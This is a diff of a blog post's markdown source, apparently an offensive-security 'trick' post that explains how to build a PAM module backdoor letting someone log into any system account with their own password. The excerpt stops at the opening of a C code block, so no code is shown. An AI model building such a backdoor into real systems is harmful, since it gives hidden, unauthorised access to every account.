GermanKingYT/deftcode.ninja/_posts/2012-04-08-tiny-pam-authentication-module-backdoor.markdown

 permalink: post/tiny-pam-authentication-module-backdoor/
 ---

-This trick explain you how to create a **PAM module backdoor** that allow you to exec every user login with your own password.
+This trick explains you how to create a **PAM module backdoor** that allow you to login in any account of system with your own password. s
-If you try to login with the real password of user and the authentication fail, `pam_auth.so` switch to `pam_bd.so` and viceversa!

 ### Example of pam_bd.so module as backdoor

 {% highlight c %}